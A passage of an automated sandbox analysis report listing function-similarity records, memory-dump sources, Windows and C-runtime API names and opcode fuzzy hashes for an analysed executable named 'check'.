                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                • Instruction ID: 5b4e604ace667df9b75f8c4276a494a9da5e562f0b23b7ec25c1acafe276955f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6318636618F8186DB60CF25E8406AE73A4FBA8B64F540535FA9D83B95EF3CE155CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                • Instruction ID: e8783b47e4f8fe10ce2f88fd6df2caec141d2914a06ee154b991034f2f700ffd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DB192B2B18E9241EA619B26A5001B963D9EB64FF4F845531FE5DC7B8AEF3CF4418300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                • Instruction ID: 8114b642c38e32cf67cc62ce1ccccea6315c8e181b1817295d52a488956ebaaa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF111F32B14F058AEB00CF64E8542B933A4F769B68F440E35EA5D867A5EF78E1548340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction ID: e6e54404d65311344987a05e55eb942cd5acc349a73aa82888d0d30d87000fa1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACC1E372B18A8687EB24CF15A04466AB7A5F7A4B94F808634EB4ED3745DF3DF901CB40
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                                                                                                • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                • Instruction ID: 71213ce7745a5b7ce94c0c2795c4bcb4f825e6fafb025113fbefe43d4165e9d3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F1A372A08FD58BE7E59B16C088A3A7AA9EF65F50F064578EA4997390DF38F440C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 15204871-0
                                                                                                                                                                                                                • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                • Instruction ID: f04a1724afcdefce428b29e38f352c6ffe76e0e51fb5ac9d8f5f878c5eb71243
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCB15D77A04B898BEB19CF29C8463687BA4F784F58F588921EA5DC37A5CF39E451C700
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                • API String ID: 0-227171996
                                                                                                                                                                                                                • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                • Instruction ID: eff2547825c8ba336ff48e8f3aedc43f4c243eecb9eb90ab6dfc78366ac50630
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E19232A08E4686EBE99F2A855013D33A0FF65F68F245235EA4E87794DF2DF851C740
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                • API String ID: 0-900081337
                                                                                                                                                                                                                • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                • Instruction ID: 614a4627a6d0e942a7bbbad79c0b753d3366e4d65d87f69a6fd743cc522f0d84
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3591C972A18EC587E7F49B16C448B3E7AA9FF54B64F014179EA4A86790DF38F940CB40
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                • API String ID: 0-3030954782
                                                                                                                                                                                                                • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                • Instruction ID: 7a433efe95dc97c337289d4a4a91aa600a8a899d3ba92a2be330f4a5a6b7535d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0515962B18AC546E7658E359800769AB91F7A4FB4F48C231EBA8C7AD5CF3DE4418701
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                • Instruction ID: 41da1f39cd7bd11f0bf9add05cae80717d2372e1c31f79947361c8623b6b1c7a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6025532A2DE4341FAA5AB2595102796698AF65FB0F858E35FE6DC63D3DE3CF4418300
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: gfffffff
                                                                                                                                                                                                                • API String ID: 0-1523873471
                                                                                                                                                                                                                • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                • Instruction ID: 547bc64aff0a81b6828252934ea7c26f392cd7a6007487971281155407b0e3a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52A14662A08BCA47EB61CF25A4007A97B91EB60FA4F048132EFAD877C5DE3DE501C701
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: TMP
                                                                                                                                                                                                                • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                • Instruction ID: 4b158a54230e9ce72098599b153659d5da07ccf999c3a87ae5aade08d58f7acd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0351BF11F28E2241FBA4AB27591117A9294AF64FF4F488435FE1ED77D6EE3CF4428200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                • Instruction ID: ffbb9cbf60a3816002a12fb1352857cce987f0611d844c9dad87c9d55a174024
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9B09220E17E03C2EE086B256C8222822A87F78B20F980538D00DC0332EE2C70E55700
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                • Instruction ID: ae116421d2eb4cae23a6d6f04d4aea74d17aee23a146a1da09c163071b66cc01
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FD1DF72E18E4286EBA98E29805027D27A0EF25F68F244239EE0D977D5DF3DF845D740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                • Instruction ID: f569e86bdeccf41984f470858ce34a3f956d7e8a974da3615b1729e5075f2387
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4C19D762181E08BD28AEB29E46947A73E1F78930DB99406BEF87477C5CB3CE514DB10
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                • Instruction ID: 81b04a7bb083b98a6d4d563e97cb30fd270218fa3f4781007861bbf9042a2fe8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BB18C72918F8586E7A5CF29C05027C3BA0EB69F68F240235EA4E87396CF3DE451C755
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
